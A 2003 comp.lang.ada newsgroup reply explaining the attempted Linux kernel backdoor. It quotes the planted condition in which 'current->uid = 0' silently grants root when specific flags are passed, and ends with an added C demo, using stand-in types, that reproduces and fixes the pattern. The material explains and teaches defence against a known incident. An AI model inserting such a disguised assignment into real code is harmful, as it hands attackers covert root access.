comp.lang.ada
From: Vinzent 'Gadget' Hoefler <ada.rocks@jlfencey.com>
Subject: Re: C's trikery semantic opens up backdoor in new Linux kernel
Date: Wed, 12 Nov 2003 08:18:27 +0100
Message-ID: <bosmuu$1hui4o$1@ID-175126.news.uni-berlin.de>
In-Reply-To: pan.2003.11.12.05.13.39.401308@Smoke

J Cusick wrote:

>On Wed, 12 Nov 2003 04:26:44 +0000, Stephane Richard wrote:
>
>> For some reason, I can't open that link you posted here..
>
>The Register site seems to be down at the moment... The link is good.
>
>The article discusses the fact that someone tried to slide in a C line 
>(actually 2 lines) that trashed the tcp stack allowing a negative offset

No. It is worse than that.

The interesting line in question is this one:

|if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

At first this looks like a sanity check. But look closer. This single
line serves one single purpose: to give you root privileges when you
just pass the right flags. Note the "current->uid = 0" instead of
"current->uid == 0". Who the hell had the fucking bad idea that
assignments could return values?

Let's stretch the example and imagine it was just a simple typo of a
tired programmer who wrote the PIN-code checking routine for an ATM
and it slipped through the review...


Vinzent.
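
Added example, not part of the original post: a small C program showing that the quoted condition changes the uid as a side effect while the `if` body never runs. `struct task`, the `DEMO_*` flag values and the error return are constructed stand-ins, and the pointer-to-const parameter in `check_fixed` is one hardening option that the thread does not mention.

```c
#include <stdio.h>

/* Constructed stand-ins for this demo; not the kernel's definitions. */
#define DEMO_WCLONE 0x80000000u
#define DEMO_WALL   0x40000000u

struct task { unsigned int uid; };   /* hypothetical, mimics current->uid */

/* Same shape as the quoted line: '=' assigns 0 to uid. The value of the
 * assignment is 0 (false), so the branch body never runs and the caller
 * sees no error, but the side effect has already been applied. */
static int check_backdoored(struct task *current, unsigned int options)
{
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (current->uid = 0))
        return -1;   /* assumed error path; the post shows only the condition */
    return 0;
}

/* Intended comparison. Taking the task through a pointer-to-const turns
 * 'current->uid = 0' into a compile error instead of a silent write. */
static int check_fixed(const struct task *current, unsigned int options)
{
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (current->uid == 0))
        return -1;
    return 0;
}

/* Run one check on a fresh task with uid 1000; return the uid afterwards. */
static unsigned int uid_after(int backdoored, unsigned int options)
{
    struct task t = { 1000 };
    if (backdoored)
        (void)check_backdoored(&t, options);
    else
        (void)check_fixed(&t, options);
    return t.uid;
}

int main(void)
{
    unsigned int magic = DEMO_WCLONE | DEMO_WALL;
    printf("backdoored, magic flags: uid=%u\n", uid_after(1, magic));
    printf("backdoored, other flags: uid=%u\n", uid_after(1, DEMO_WALL));
    printf("fixed,      magic flags: uid=%u\n", uid_after(0, magic));
    return 0;
}
```

Because `&&` short-circuits, the write to `uid` happens only when the flag comparison is true, which is why ordinary calls behave normally.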


